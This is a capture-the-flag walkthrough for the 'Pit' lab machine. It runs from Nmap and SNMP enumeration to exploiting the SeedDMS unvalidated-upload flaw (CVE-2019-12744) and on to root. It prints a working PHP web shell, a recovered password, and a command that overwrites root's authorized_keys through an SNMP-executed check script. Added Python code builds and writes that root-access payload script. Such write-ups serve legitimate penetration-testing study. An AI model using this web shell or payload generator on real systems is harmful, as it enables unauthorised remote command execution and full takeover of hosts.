Pit


NMAP

Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-13 22:00 IST
Nmap scan report for 10.10.10.241
Host is up (0.13s latency).

PORT     STATE SERVICE          VERSION
22/tcp   open  ssh              OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp   open  http             nginx 1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
|_http-server-header: nginx/1.14.1
9090/tcp open  ssl/zeus-admin?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p

SNMP

PORT    STATE SERVICE
161/udp open  snmp
| snmp-processes:
|   1:
|   2:
|   3:
|   4:
|_  5:
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 4ca7e41263c5985e00000000
|   snmpEngineBoots: 76
|_  snmpEngineTime: 37s
| snmp-sysdescr: Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64
|_  System uptime: 37.94s (3794 timeticks)

A full walk of the tree, saved for later grepping:

snmpwalk -v2c -c public 10.10.10.241 . | tee snmpwalk.out

It looks like SNMP is executing /usr/bin/monitor (the NET-SNMP extend entry); its output can be seen below.

I also found the directory /var/www/html/seeddms51x/seeddms.

I did not find SeedDMS when I tried the URL with the IP address:
http://10.10.10.241/seeddms51x/seeddms

Took a look at port 9090 certificate

Added dms-pit.htb to /etc/hosts.

In the SNMP output I also found a username: michelle.

I'll try the default password pattern username/username.

michelle:michelle worked.

Did a searchsploit against SeedDMS.

The RCE sticks out, but we have a newer version, 5.1.15.

Downloaded the changelog


The fix they added was a .htaccess file. That won't help here: the server is running nginx, not Apache, so a .htaccess file does nothing and the upload path stays reachable.

I'll exploit the RCE vulnerability.


https://bryanleong98.medium.com/cve-2019-12744-remote-command-execution-through-unvalidated-file-upload-in-seeddms-versions-5-1-1-5c32d90fda28

I need to add a document; as the document, I can upload a PHP backdoor.

I can add a document here:
http://dms-pit.htb/seeddms51x/seeddms/out/out.AddDocument.php?folderid=8&showtree=1

Added this as the document (a minimal web shell: it runs whatever is passed in the cmd parameter with system() and prints the output):

<?php
// Minimal web shell: execute the cmd request parameter via system()
if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = $_REQUEST['cmd'];
    system($cmd);
    echo "</pre>";
    die;
}
?>

Add document.

The backdoor can then be requested directly, but first we need to know the document id.

When hovering the mouse over the file name we can see the document id; mine is 29.
Change the document id in the URL below to yours.
http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=id

I tried to get a reverse shell but was not able to (some kind of firewall, maybe), so I used what I had to look for credentials.

There is a conf directory.


Which has a settings.xml

Did not find credentials in that settings.xml.

Enumerating further, there was another conf directory one level higher:
../../../conf/settings.xml

That one contained a password. I'll check for password reuse.

On port 9090 it worked with michelle:ied^ieY6xoquu.

PORT 9090
I have a web terminal.

I remember that when I ran the SNMP scan earlier it was executing /usr/bin/monitor.

It executes anything in /usr/local/monitoring whose name starts with check and ends with sh.

At first I was stuck because there were no write permissions on /usr/local/monitoring for my user, but getfacl gave a clear picture.

[michelle@pit ~]$ ls -la /usr/local/ | grep monitoring


drwxrwx---+ 2 root root 101 Feb 14 12:30 monitoring

Because of the + symbol in the permissions I used getfacl; the + means there are additional ACL entries set on the directory beyond the classic mode bits.

[michelle@pit ~]$ getfacl /usr/local/monitoring


getfacl: Removing leading '/' from absolute path names
# file: usr/local/monitoring
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---

michelle can write and execute but can't read, which is why I got an error whenever I tried to list or read anything in there.
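The getfacl listing above is worth being able to read mechanically: a named user entry (user:michelle:-wx) only grants what survives the mask, and the evaluation order is owner, named user, groups, other. The following is an added example (not code from the original writeup) that parses getfacl output and computes a user's effective permissions; the sample input is the listing from this page, and the group membership passed in is an assumption for the demonstration.

```python
import re

# Constructed sample: the getfacl output for /usr/local/monitoring as shown
# on this page (the "+" in ls -la is what signals an extended ACL).
GETFACL_OUTPUT = """\
# file: usr/local/monitoring
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---
"""


def parse_getfacl(text):
    """Parse getfacl(1) output into owner, group and the ACL entries."""
    acl = {"owner": None, "group": None, "user_obj": None, "group_obj": None,
           "user": {}, "group_named": {}, "mask": None, "other": None}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("#"):
            m = re.match(r"#\s*(owner|group):\s*(\S+)", line)
            if m:
                acl[m.group(1)] = m.group(2)
            continue
        # Entries look like tag:qualifier:perms, e.g. user:michelle:-wx
        tag, qualifier, perms = line.split(":", 2)
        perms = perms.split()[0]          # drop any "#effective:..." note
        if tag == "user":
            if qualifier:
                acl["user"][qualifier] = perms
            else:
                acl["user_obj"] = perms
        elif tag == "group":
            if qualifier:
                acl["group_named"][qualifier] = perms
            else:
                acl["group_obj"] = perms
        elif tag == "mask":
            acl["mask"] = perms
        elif tag == "other":
            acl["other"] = perms
    return acl


def apply_mask(perms, mask):
    """Named users, named groups and the owning group are ANDed with the mask."""
    if mask is None:
        return perms
    return "".join(p if (p != "-" and m != "-") else "-"
                   for p, m in zip(perms, mask))


def effective_perms(acl, user, groups=()):
    """Effective rwx string for `user` (a member of `groups`), following the
    POSIX ACL order: owner, named user, matching group entries, then other."""
    if user == acl["owner"]:
        return acl["user_obj"]                 # the owner entry is never masked
    if user in acl["user"]:
        return apply_mask(acl["user"][user], acl["mask"])
    matched = []
    if acl["group"] in groups:
        matched.append(acl["group_obj"])
    matched += [p for g, p in acl["group_named"].items() if g in groups]
    if matched:
        # Access is granted if any matching group entry grants the bit
        union = "".join(next((p[i] for p in matched if p[i] != "-"), "-")
                        for i in range(3))
        return apply_mask(union, acl["mask"])
    return acl["other"]


if __name__ == "__main__":
    acl = parse_getfacl(GETFACL_OUTPUT)
    # Assumed group membership for the demo: michelle is only in her own group
    print("michelle:", effective_perms(acl, "michelle", groups=("michelle",)))
    # A tighter mask shows why the listed entry is not always what you get
    tight = parse_getfacl(GETFACL_OUTPUT.replace("mask::rwx", "mask::--x"))
    print("michelle with mask --x:", effective_perms(tight, "michelle"))
```

With the page's listing this yields -wx for michelle (write and traverse, no read), which matches the "permission denied" on ls and the success of writing a file there. The second call shows the mask at work: the same user:michelle:-wx entry collapses to --x once the mask drops the write bit, so always read the mask line before concluding that a named entry is usable.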

Now I'll run snmpwalk against the extend objects again and hope my script gets executed and I see hello in the output:

snmpwalk -v2c -c public 10.10.10.241 NET-SNMP-EXTEND-MIB::nsExtendObjects

I tried a reverse shell again but it did not work (firewall), so I inserted an SSH key on the target instead:

echo 'echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKcfMwIbRY6rYQ2lRnLmzzJKA5HAYC1xuyTpxCQbJ+o0 > /root/.ssh/authorized_keys' > check_hello.sh

After running the snmpwalk command, the SSH key was written to /root/.ssh/authorized_keys.
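Two things a practitioner would want to check before firing this: that the file name actually matches the pattern the monitor picks up (check...sh), and that the key line is well formed, since a malformed line silently gives no access and the whole trigger has to be repeated. The page's one-liner also overwrites root's authorized_keys, which destroys any existing key. The following is an added example, not code from the original writeup; the check*sh glob is taken from the page's description of /usr/bin/monitor and is an assumption about that binary, and the generated script appends rather than overwrites.

```python
import base64
import fnmatch
import shlex
import struct

# Assumption from the page's description of /usr/bin/monitor: it runs
# files in /usr/local/monitoring whose names start with check and end in sh.
MONITOR_GLOB = "check*sh"

# The public key the page pushed into /root/.ssh/authorized_keys.
PUBKEY = ("ssh-ed25519 "
          "AAAAC3NzaC1lZDI1NTE5AAAAIKcfMwIbRY6rYQ2lRnLmzzJKA5HAYC1xuyTpxCQbJ+o0")


def picked_up_by_monitor(filename):
    """True if the name matches the check*sh convention the monitor executes."""
    return fnmatch.fnmatchcase(filename, MONITOR_GLOB)


def valid_ed25519_pubkey(line):
    """Check an authorized_keys line is a well-formed ssh-ed25519 key:
    the blob is an RFC 4253 string "ssh-ed25519" followed by a 32-byte string."""
    parts = line.split()
    if len(parts) < 2 or parts[0] != "ssh-ed25519":
        return False
    try:
        blob = base64.b64decode(parts[1], validate=True)
    except ValueError:                 # binascii.Error is a ValueError
        return False
    if len(blob) != 4 + 11 + 4 + 32:
        return False
    (tlen,) = struct.unpack(">I", blob[:4])
    if tlen != 11 or blob[4:15] != b"ssh-ed25519":
        return False
    (klen,) = struct.unpack(">I", blob[15:19])
    return klen == 32


def build_check_script(pubkey, target_home="/root"):
    """Return the body of a check_*.sh that appends pubkey to authorized_keys,
    creating ~/.ssh with safe modes first. shlex.quote keeps the key from
    breaking the shell line, and >> preserves any key already present."""
    if not valid_ed25519_pubkey(pubkey):
        raise ValueError("not a well-formed ssh-ed25519 public key")
    ssh_dir = f"{target_home}/.ssh"
    auth = f"{ssh_dir}/authorized_keys"
    return "\n".join([
        "#!/bin/sh",
        f"mkdir -p {shlex.quote(ssh_dir)}",
        f"chmod 700 {shlex.quote(ssh_dir)}",
        f"echo {shlex.quote(pubkey)} >> {shlex.quote(auth)}",
        f"chmod 600 {shlex.quote(auth)}",
        "",
    ])


def write_payload(filename, pubkey, directory="."):
    """Write the script under `directory` only if the monitor would run it.
    Returns the path written. Defaults to the current directory so this runs
    offline; on the target it would be /usr/local/monitoring."""
    if not picked_up_by_monitor(filename):
        raise ValueError(f"{filename!r} does not match {MONITOR_GLOB}")
    path = f"{directory}/{filename}"
    with open(path, "w") as fh:
        fh.write(build_check_script(pubkey))
    return path


if __name__ == "__main__":
    print(build_check_script(PUBKEY))
```

The script the page used, check_hello.sh, passes the name check; a name like hello.sh or check_hello.txt would sit in the directory unnoticed, with no way to see that from a directory you cannot list. Triggering is unchanged: walk NET-SNMP-EXTEND-MIB::nsExtendObjects and the monitor runs the new file as root.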

Root
